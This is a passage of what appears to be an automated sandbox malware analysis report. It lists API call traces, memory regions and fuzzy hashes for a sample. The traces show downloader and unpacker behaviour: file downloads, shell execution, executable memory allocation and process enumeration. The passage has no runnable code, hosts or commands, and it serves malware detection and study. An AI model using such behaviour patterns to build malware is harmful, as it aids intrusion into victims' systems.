                                                                            • Associated: 00000000.00000002.2038596081.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038596081.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038875021.0000000000438000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2039027110.0000000000446000.00000080.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_sxs.jbxd
                                                                            Similarity
                                                                            • API ID: CreateMutex
                                                                            • String ID:
                                                                            • API String ID: 1964310414-0
                                                                            • Opcode ID: 4e517a16085b8900b141571b75f19e29287a41f7ed24e47c7e5cc36522aeb123
                                                                            • Instruction ID: 42de1c329415a5983c08d079f819a82d79578491e5c84c113ccbfbe26003380b
                                                                            • Opcode Fuzzy Hash: 4e517a16085b8900b141571b75f19e29287a41f7ed24e47c7e5cc36522aeb123
                                                                            • Instruction Fuzzy Hash: 88D01273250248AFC700EEBDCC06DAB33DC9B68609B048429B918C7100D13DE9508B60
                                                                            APIs
                                                                            • CreateMutexA.KERNEL32(?,?,?,?,?), ref: 004042C2
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2038596081.0000000000401000.00000004.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2038541464.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038596081.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038596081.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038596081.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038875021.0000000000438000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2039027110.0000000000446000.00000080.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_sxs.jbxd
                                                                            Similarity
                                                                            • API ID: CreateMutex
                                                                            • String ID:
                                                                            • API String ID: 1964310414-0
                                                                            • Opcode ID: 21e0619b74412fae9514185c35c6bd95fbb7b52f213a822672066e7264c0ded7
                                                                            • Instruction ID: dbdaa29d8d5ab3acf8359d31fd046521d7a3cbff9559bf3fa2f5df482b1e4750
                                                                            • Opcode Fuzzy Hash: 21e0619b74412fae9514185c35c6bd95fbb7b52f213a822672066e7264c0ded7
                                                                            • Instruction Fuzzy Hash: 01C01273150248ABC700EEA9CC06D9B33DC5B68609B048429B918C7100C13DE5508B60
                                                                            APIs
                                                                            • InternetGetConnectedState.WININET(?,00000000), ref: 004084A3
                                                                              • Part of subcall function 004080C8: DeleteUrlCacheEntry.WININET(00000000), ref: 0040810F
                                                                              • Part of subcall function 004080C8: DeleteFileA.KERNEL32(00000000,00000000,00000000,0040819E,?,00000000,00000000,?,004084B1,?,00000000,?,004084C7,000493E0), ref: 00408132
                                                                              • Part of subcall function 004080C8: URLDownloadToFileA.URLMON(00000000,00000000,00000000,00000000,00000000), ref: 00408168
                                                                              • Part of subcall function 004080C8: DeleteUrlCacheEntry.WININET(00000000), ref: 0040817E
                                                                              • Part of subcall function 004081E8: DeleteUrlCacheEntry.WININET(00000000), ref: 00408232
                                                                              • Part of subcall function 004081E8: DeleteFileA.KERNEL32(00000000,00000000,00000000,004083C3,?,00000000,00000000,00000000,00000000,00000000,?,004084B6,?,00000000,?,004084C7), ref: 00408255
                                                                              • Part of subcall function 004081E8: URLDownloadToFileA.URLMON(00000000,00000000,00000000,00000000,00000000), ref: 0040828B
                                                                              • Part of subcall function 004081E8: Sleep.KERNEL32(000003E8,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,004083C3,?,00000000,00000000,00000000,00000000,00000000), ref: 00408299
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2038596081.0000000000401000.00000004.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2038541464.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038596081.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038596081.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038596081.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038875021.0000000000438000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2039027110.0000000000446000.00000080.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_sxs.jbxd
                                                                            Similarity
                                                                            • API ID: Delete$File$CacheEntry$Download$ConnectedInternetSleepState
                                                                            • String ID:
                                                                            • API String ID: 1369373786-0
                                                                            • Opcode ID: dc49b30eb8cb48e74656dd8cc77bc0eff6cc65cfc1c0bbd4c620f9731a48f245
                                                                            • Instruction ID: 670bd1f1822fbab38942ef8954843972be358391e24c76c7ecbd6b66639f9f51
                                                                            • Opcode Fuzzy Hash: dc49b30eb8cb48e74656dd8cc77bc0eff6cc65cfc1c0bbd4c620f9731a48f245
                                                                            • Instruction Fuzzy Hash: 15C012A011820062D600BBA6AA02B5A668C0F80714F41443EB6C4A60C1EE3C8044822A
                                                                            APIs
                                                                            • RegOpenKeyExA.ADVAPI32(80000002,00000000,00000000,000F003F,?,00000000,00404C35,?,?,?,00407E6B,?,00000001,00000000,000DBBA0,00000000), ref: 00404C0C
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2038596081.0000000000401000.00000004.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2038541464.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038596081.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038596081.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038596081.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038875021.0000000000438000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2039027110.0000000000446000.00000080.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_sxs.jbxd
                                                                            Similarity
                                                                            • API ID: Open
                                                                            • String ID:
                                                                            • API String ID: 71445658-0
                                                                            • Opcode ID: 601bb27103df1dd6ab7ae887f59132927187b2ef7b094d011fc2b20d749a3531
                                                                            • Instruction ID: c017c2d3cd7702cc40293f0c0b92f299cfcc0552216a4ded47398421e2e7ca9f
                                                                            • Opcode Fuzzy Hash: 601bb27103df1dd6ab7ae887f59132927187b2ef7b094d011fc2b20d749a3531
                                                                            • Instruction Fuzzy Hash: 49C08CF03092007BDA0CAA148C03F7E329C8780750F00442DB28096185C66054008129
                                                                            APIs
                                                                            • InternetGetConnectedState.WININET(?,00000000), ref: 004068DF
                                                                              • Part of subcall function 00406728: ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,00000000,00000003), ref: 004067D0
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2038596081.0000000000401000.00000004.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2038541464.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038596081.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038596081.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038596081.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038875021.0000000000438000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2039027110.0000000000446000.00000080.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_sxs.jbxd
                                                                            Similarity
                                                                            • API ID: ConnectedExecuteInternetShellState
                                                                            • String ID:
                                                                            • API String ID: 3822808191-0
                                                                            • Opcode ID: 5fe85a0e7d98bcb115740b811f82c610ad9dcd17b5c26daa3db827d2b0b6e89f
                                                                            • Instruction ID: cb9ba5a357dbf17f807466452ced53c340c992696767b35d6928e3153f41e3a9
                                                                            • Opcode Fuzzy Hash: 5fe85a0e7d98bcb115740b811f82c610ad9dcd17b5c26daa3db827d2b0b6e89f
                                                                            • Instruction Fuzzy Hash: 41C08CB110820061D6007B62AD01B5A66CC8F80704F41483E7684E20C4EB3CC444922A
                                                                            APIs
                                                                            • VirtualFree.KERNEL32(FFFFFFFF,00000000,00008000), ref: 00401410
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2038596081.0000000000401000.00000004.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2038541464.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038596081.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038596081.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038596081.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038875021.0000000000438000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2039027110.0000000000446000.00000080.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_sxs.jbxd
                                                                            Similarity
                                                                            • API ID: FreeVirtual
                                                                            • String ID:
                                                                            • API String ID: 1263568516-0
                                                                            • Opcode ID: 3a89578715c780a72c9bcc2f7238351524d5baf693c614b1e8794c1720b1a924
                                                                            • Instruction ID: 1e9abf7fae11d483954ba497bcecb7b42a35322519b3fee74413ce08071db684
                                                                            • Opcode Fuzzy Hash: 3a89578715c780a72c9bcc2f7238351524d5baf693c614b1e8794c1720b1a924
                                                                            • Instruction Fuzzy Hash: CC21F970608711AFD710DF19D88065BBBE4EF85720F14C92AE4989B3A1D378EC41CB5A
                                                                            APIs
                                                                            • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 004014D1
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2038596081.0000000000401000.00000004.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2038541464.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038596081.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038596081.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038596081.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038875021.0000000000438000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2039027110.0000000000446000.00000080.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_sxs.jbxd
                                                                            Similarity
                                                                            • API ID: AllocVirtual
                                                                            • String ID:
                                                                            • API String ID: 4275171209-0
                                                                            • Opcode ID: 21dbc31cb6900595ad653052610acc884adf6bc7d0a0183df4107cd3429863bc
                                                                            • Instruction ID: b23f443f85bfc2a6968270b1b6cd2558eb490b707325928d34c95879452a6769
                                                                            • Opcode Fuzzy Hash: 21dbc31cb6900595ad653052610acc884adf6bc7d0a0183df4107cd3429863bc
                                                                            • Instruction Fuzzy Hash: 2C11AC72A047019FC320CF29CD80A2BB7E1EBC4360F15C63EE588A73B5E634AC40C689
                                                                            APIs
                                                                            • VirtualFree.KERNEL32(00000000,00000000,00004000,?,0000000C,?,?,00003FFF,0040175F), ref: 00401552
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2038596081.0000000000401000.00000004.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2038541464.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038596081.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038596081.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038596081.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038875021.0000000000438000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2039027110.0000000000446000.00000080.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_sxs.jbxd
                                                                            Similarity
                                                                            • API ID: FreeVirtual
                                                                            • String ID:
                                                                            • API String ID: 1263568516-0
                                                                            • Opcode ID: 5a288f3db3f787fd20fc88d3d5c71f120b612570d67012e4ddc5ad127cebd5a4
                                                                            • Instruction ID: 909510ce892baa7c9b48256ed29b6e7cd33d2823f62f9fa2e1c19f749eef1782
                                                                            • Opcode Fuzzy Hash: 5a288f3db3f787fd20fc88d3d5c71f120b612570d67012e4ddc5ad127cebd5a4
                                                                            • Instruction Fuzzy Hash: 7C01F7726443146FC310DE28DCC092A77A4EBC5364F15053EDA86AB3A1E63AAC0187A9
                                                                            APIs
                                                                            • VirtualAlloc.KERNEL32(00000000,00020000,00001000,00000040,?,?,?,?,?,?,?,00000007,?,?,00439C51,?), ref: 00439D1B
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2038875021.0000000000438000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2038541464.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038596081.0000000000401000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038596081.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038596081.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038596081.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2039027110.0000000000446000.00000080.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_sxs.jbxd
                                                                            Similarity
                                                                            • API ID: AllocVirtual
                                                                            • String ID:
                                                                            • API String ID: 4275171209-0
                                                                            • Opcode ID: 1719246a0053cc99c24b234b1e179e3f801c697a2531001e2cc0710cff91ed1e
                                                                            • Instruction ID: 794ef5d78045ed4d742bdaeeac8ed0779eb977f76541356490a23fe8d5b0fb08
                                                                            • Opcode Fuzzy Hash: 1719246a0053cc99c24b234b1e179e3f801c697a2531001e2cc0710cff91ed1e
                                                                            • Instruction Fuzzy Hash: 3EF0B4B26493207AF124670AAC8BF973F5CDF85B75F00042AF64D5A1C1E4997C10C2BA
                                                                            APIs
                                                                            • VirtualAlloc.KERNEL32(00000000,00020000,00001000,00000040,004381FA,004381FA,004381FA), ref: 00438265
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2038875021.0000000000438000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2038541464.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038596081.0000000000401000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038596081.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038596081.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038596081.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2039027110.0000000000446000.00000080.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_sxs.jbxd
                                                                            Similarity
                                                                            • API ID: AllocVirtual
                                                                            • String ID:
                                                                            • API String ID: 4275171209-0
                                                                            • Opcode ID: 43f065defaea95145b3ecdcf874f9926135ac585ebd2532a17b86c1669fef322
                                                                            • Instruction ID: cf7fc80abf0a610b938b0f6de2e472192636330f029e0b36f2c69517e1b1d411
                                                                            • Opcode Fuzzy Hash: 43f065defaea95145b3ecdcf874f9926135ac585ebd2532a17b86c1669fef322
                                                                            • Instruction Fuzzy Hash: E5018831A443189BDB359E29CC04BDAB7B1EB44750F2104ADF584B7281CAB4AE808E08
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2038596081.0000000000401000.00000004.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2038541464.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038596081.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038596081.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038596081.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038875021.0000000000438000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2039027110.0000000000446000.00000080.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_sxs.jbxd
                                                                            Similarity
                                                                            • API ID: CloseHandle
                                                                            • String ID:
                                                                            • API String ID: 2962429428-0
                                                                            • Opcode ID: 8ae584e4023b59ee75ab96c522648a8cbc719458c716cde17b53aa8cd14c598c
                                                                            • Instruction ID: 24a9b9a5f53f68d2e9ae0a20dfd92328ab467e55e5b9cffb966d9a0b50497f93
                                                                            • Opcode Fuzzy Hash: 8ae584e4023b59ee75ab96c522648a8cbc719458c716cde17b53aa8cd14c598c
                                                                            • Instruction Fuzzy Hash: 48A022C222330002C80022F20CC2EA2808CA2082EA3A000A23000C00A3C82C08800020
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2039572472.0000000000530000.00000040.00001000.00020000.00000000.sdmp, Offset: 00530000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_530000_sxs.jbxd
                                                                            Similarity
                                                                            • API ID: Sleep
                                                                            • String ID:
                                                                            • API String ID: 3472027048-0
                                                                            • Opcode ID: 83ba358f1d4f9be8f70de9c75f6af8435493c9470f2672efbf93f82a94d27bc8
                                                                            • Instruction ID: 35db9f488ffd0636bb9cf030617f311de7711ba3a97448446235c477cbc56070
                                                                            • Opcode Fuzzy Hash: 83ba358f1d4f9be8f70de9c75f6af8435493c9470f2672efbf93f82a94d27bc8
                                                                            • Instruction Fuzzy Hash: 76B01233508B01A7820E6BB09D0F80A7B976BA4B03F40D426F308880B0CFB09414FA1D
                                                                            APIs
                                                                            • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040,005316A6,00001000), ref: 005311C3
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2039572472.0000000000530000.00000040.00001000.00020000.00000000.sdmp, Offset: 00530000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_530000_sxs.jbxd
                                                                            Similarity
                                                                            • API ID: AllocVirtual
                                                                            • String ID:
                                                                            • API String ID: 4275171209-0
                                                                            • Opcode ID: 62a7b74bd76db8a5fc26b65ac9bd9eaa107a16f2abf41db949a32e9ff1b8fa1d
                                                                            • Instruction ID: 1fcb65d395787b0b6db5600859cc9b342ae49ae71f3942b2a60d767fcdcba42f
                                                                            • Opcode Fuzzy Hash: 62a7b74bd76db8a5fc26b65ac9bd9eaa107a16f2abf41db949a32e9ff1b8fa1d
                                                                            • Instruction Fuzzy Hash: EBB012302843007AFD1107404D0EF0436116744B42F108000B348280D041F05004D60A
                                                                            APIs
                                                                            • VirtualFree.KERNELBASE(00008000,00000000,00008000,00531847,00000000), ref: 005311D5
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2039572472.0000000000530000.00000040.00001000.00020000.00000000.sdmp, Offset: 00530000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_530000_sxs.jbxd
                                                                            Similarity
                                                                            • API ID: FreeVirtual
                                                                            • String ID:
                                                                            • API String ID: 1263568516-0
                                                                            • Opcode ID: 3f1d20d579311b3a40eb1c4a4ad8a342f9f540bd2fe59f4924e8cb646b54176f
                                                                            • Instruction ID: 144dc3af3683bfe869fbd5cbf28f188937a1f9eb92b5d81924be8f1420cf068f
                                                                            • Opcode Fuzzy Hash: 3f1d20d579311b3a40eb1c4a4ad8a342f9f540bd2fe59f4924e8cb646b54176f
                                                                            • Instruction Fuzzy Hash: D3A00170684A00AAEE695B11AE0EB097A61AB90B11F20C554B299681E09AB16418EA0A
                                                                            APIs
                                                                            • Sleep.KERNEL32(000493E0), ref: 004084BD
                                                                              • Part of subcall function 00408494: InternetGetConnectedState.WININET(?,00000000), ref: 004084A3
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2038596081.0000000000401000.00000004.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2038541464.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038596081.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038596081.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038596081.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038875021.0000000000438000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2039027110.0000000000446000.00000080.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_sxs.jbxd
                                                                            Similarity
                                                                            • API ID: ConnectedInternetSleepState
                                                                            • String ID:
                                                                            • API String ID: 1839875000-0
                                                                            • Opcode ID: 9f89b1ffa88328b633213964eacc77fe1f4eb6ec4a26f25899b98c99db20ae36
                                                                            • Instruction ID: 531a484f82c7889d25c20d7142e9803b131f223dc912937a257ed96ba5c7c79c
                                                                            • Opcode Fuzzy Hash: 9f89b1ffa88328b633213964eacc77fe1f4eb6ec4a26f25899b98c99db20ae36
                                                                            • Instruction Fuzzy Hash:
                                                                            APIs
                                                                            • PostQuitMessage.USER32(00000000), ref: 00404AAA
                                                                            • NtdllDefWindowProc_A.NTDLL(?,?,?,?), ref: 00404ABE
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2038596081.0000000000401000.00000004.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2038541464.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038596081.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038596081.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038596081.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038875021.0000000000438000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2039027110.0000000000446000.00000080.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_sxs.jbxd
                                                                            Similarity
                                                                            • API ID: MessageNtdllPostProc_QuitWindow
                                                                            • String ID:
                                                                            • API String ID: 4264772764-0
                                                                            • Opcode ID: 09b9339f5cc573032236493d8dceb665ca5f08ba7ea5b0146747c0737a21e41f
                                                                            • Instruction ID: 6d0fe3e5f2a624f7a99d633fdd4a9b0fdd2fbeae9b853d00227d1a052b52fcf1
                                                                            • Opcode Fuzzy Hash: 09b9339f5cc573032236493d8dceb665ca5f08ba7ea5b0146747c0737a21e41f
                                                                            • Instruction Fuzzy Hash: 68E046B13442086BCB00DEAA8CC1E5BB3DDABC8214F50C12ABA08D7285D574E8018AA9
                                                                            APIs
                                                                            • GetVersionExA.KERNEL32(?), ref: 007418BB
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000003.2016766274.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: true
                                                                            • Associated: 00000000.00000003.2016766274.0000000000745000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_3_740000_sxs.jbxd
                                                                            Similarity
                                                                            • API ID: Version
                                                                            • String ID:
                                                                            • API String ID: 1889659487-0
                                                                            • Opcode ID: fc46c89cc6669fe53aa51f048b9e8b1c9051d1b074ad228ddea146efbf931b30
                                                                            • Instruction ID: 9a8a1141fc990af0d292a022f824ee0b617b5088e6ebc60193ffa7bf56dd5f76
                                                                            • Opcode Fuzzy Hash: fc46c89cc6669fe53aa51f048b9e8b1c9051d1b074ad228ddea146efbf931b30
                                                                            • Instruction Fuzzy Hash: B1E01734A1071846EF20AB34A906B8677B8A7013ACF840690A62AE21C1DBB8DDC68B54
                                                                            APIs
                                                                            • GetSystemTime.KERNEL32(?), ref: 00402732
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2038596081.0000000000401000.00000004.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2038541464.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038596081.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038596081.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038596081.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038875021.0000000000438000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2039027110.0000000000446000.00000080.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_sxs.jbxd
                                                                            Similarity
                                                                            • API ID: SystemTime
                                                                            • String ID:
                                                                            • API String ID: 2656138-0
                                                                            • Opcode ID: 5156aabc912fc50372921c0480e37dbfba616d34ec33de77a1d74ffcab7036cd
                                                                            • Instruction ID: 805d3a75e049a96d722e3c4be3184c0ca47e53fa78bbd974ff5fbb880fea3dac
                                                                            • Opcode Fuzzy Hash: 5156aabc912fc50372921c0480e37dbfba616d34ec33de77a1d74ffcab7036cd
                                                                            • Instruction Fuzzy Hash: 2FE04F11E0010A52C704ABA5CD435EDF7AEAB95604F448173A818E62E1F636C755C348
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000003.2018675684.0000000000700000.00000040.00001000.00020000.00000000.sdmp, Offset: 00700000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_3_700000_sxs.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: %p
                                                                            • API String ID: 0-1515977560
                                                                            • Opcode ID: a3ae2da95a24d441c72884095fef37606b3857af02e8944012f1e8f9deb04d28
                                                                            • Instruction ID: dfbeba827e02e1d9acef4e13243fbbe5bf073df9ba78c386d88f0cbe16697f13
                                                                            • Opcode Fuzzy Hash: a3ae2da95a24d441c72884095fef37606b3857af02e8944012f1e8f9deb04d28
                                                                            • Instruction Fuzzy Hash: 4331E475715A424FE308CE7AC89005AFBE2FBC9248758C67CE596D7B06C270E61AD790
                                                                            APIs
                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,00000002,004047C7,00000000,?,004048B9,00000000,004049BC,?,?,?,?,?,00407553,00000320,00000000), ref: 00404554
                                                                            • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 0040456C
                                                                            • GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 0040457E
                                                                            • GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 00404590
                                                                            • GetProcAddress.KERNEL32(00000000,Heap32First), ref: 004045A2
                                                                            • GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 004045B4
                                                                            • GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 004045C6
                                                                            • GetProcAddress.KERNEL32(00000000,Process32First), ref: 004045D8
                                                                            • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004045EA
                                                                            • GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 004045FC
                                                                            • GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 0040460E
                                                                            • GetProcAddress.KERNEL32(00000000,Thread32First), ref: 00404620
                                                                            • GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 00404632
                                                                            • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00404644
                                                                            • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00404656
                                                                            • GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 00404668
                                                                            • GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 0040467A
                                                                            Strings
                                                                            Memory Dump Source
